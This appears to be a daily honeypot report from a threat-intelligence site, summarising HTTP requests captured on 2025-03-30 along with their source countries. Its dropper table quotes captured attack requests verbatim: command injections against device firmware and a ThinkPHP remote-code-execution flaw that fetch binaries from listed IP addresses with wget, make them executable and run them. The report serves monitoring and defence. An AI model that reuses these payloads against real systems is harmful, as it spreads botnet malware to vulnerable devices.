Skip to main content
  1. Daily-Posts/

Report: 2025-03-30

·466 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-03-30
#

Interaction report on http service of various honeypot around the world.

ot_simplified_report
#

Simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USDubai
FR
FR

botnet_dropper_behaviour
#

List of requests suspected of having stage 1 dropper behavior (programs designed to extract other files from their own code).

remote_addrrequest
87.121.84.30POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20-rf%20parm7%3B%20wget%20http%3A%2F%2F193.32.162.27%2Fbins%2Fparm7%3B%20chmod%20777%20parm7%3B%20.%2Fparm7%20arm7 HTTP/1.1
141.98.11.210POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20-rf%20parm7%3B%20wget%20http%3A%2F%2F193.32.162.27%2Fbins%2Fparm7%3B%20chmod%20777%20parm7%3B%20.%2Fparm7%20arm7 HTTP/1.1
141.98.11.27GET /shell?killall+-9+arm7;killall+-9+arm4;killall+-9+arm;killall+-9+/bin/sh;killall+-9+/bin/sh;killall+-9+/z/bin;killall+-9+/bin/bash;cd+/tmp;rm+arm4+efefa7;wget+http:/\x5C/176.65.134.201/efefa7;chmod+777+efefa7;./efefa7+jaws;wget+http:/\x5C/176.65.134.201/drea4;chmod+777+drea4;./drea4+jaws HTTP/1.1
124.8.182.136GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
101.69.248.251GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1
123.240.58.26GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
36.27.91.147GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1
61.130.11.82GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1
1.172.23.42GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
58.58.30.134GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1
61.231.225.60GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1

request
#

List of requests of the day that have never been detected, other requests that have already been detected and archived in the request database..

number_of_occurencerequest
1834POST /player HTTP/1.1
3041GET /odinhttpcall1743337271 HTTP/1.1
3051GET /OdinHttpCall1743337271 HTTP/1.1
3061GET /Odin/http/call1743337271 HTTP/1.1
3241\x00\x0E8-\xD2\x8BsU\xA1I\x17\x00\x00\x00\x00\x00
3331\x00\x0E\x08Hs\xA8\x9F)\x1A\x98 \x00\x00\x00\x00\x00
3341\x00\x0E8Hs\xA8\x9F)\x1A\x98 \x00\x00\x00\x00\x00
3571\x00\x0E8MG;i\x12\x90\x98\xDA\x00\x00\x00\x00\x00
3621\x00\x0E8\x1Cz\x0B\x8C\xDA\x15\xF1\x9F\x00\x00\x00\x00\x00
3851\x00\x0E8\xBDY\xC6\x8C\xC6*
4111\x00\x0E8\x80\xC9>\xE1V/_\xB1\x00\x00\x00\x00\x00
4461\x00\x0E81\xC6C20e\xA3\xC9\x00\x00\x00\x00\x00
4471GET /Authorization HTTP/1.1
4821GET /odinhttpcall1743348762 HTTP/1.1
4831GET /OdinHttpCall1743348762 HTTP/1.1
4841GET /Odin/http/call1743348762 HTTP/1.1
4851GET /socket.io/1/?t=1743323778311 HTTP/1.1
4861GET /socket.io/1/?t=1743323991659 HTTP/1.1
4951\x00\x0E8G\xDE\x93

country_iso_code
#

List of country names and number of requests received by IPs located in these countries.

number_of_occurencecountry_iso_code
01015NL
1827BG
2410US
3180GB
4139DE
5120FR
689SC
784PL
882HK
948TW
1041LT
1138PT
1228CN
1328RU
1424CA
1520NG
1617CH
1717JP
1815KR
1913BR
2010UA
219BE
228NO
237RO
246IN
256TR
265IR
275ZA
283SG
293VN
303IT
312AO
322AZ
331CL
341TH
351RS
361PK
371MY
381CZ
391AE

Related

Report: 2025-03-29
·486 words
Repport Daily
Report: 2025-03-28
·589 words
Repport Daily
Report: 2025-03-27
·530 words
Repport Daily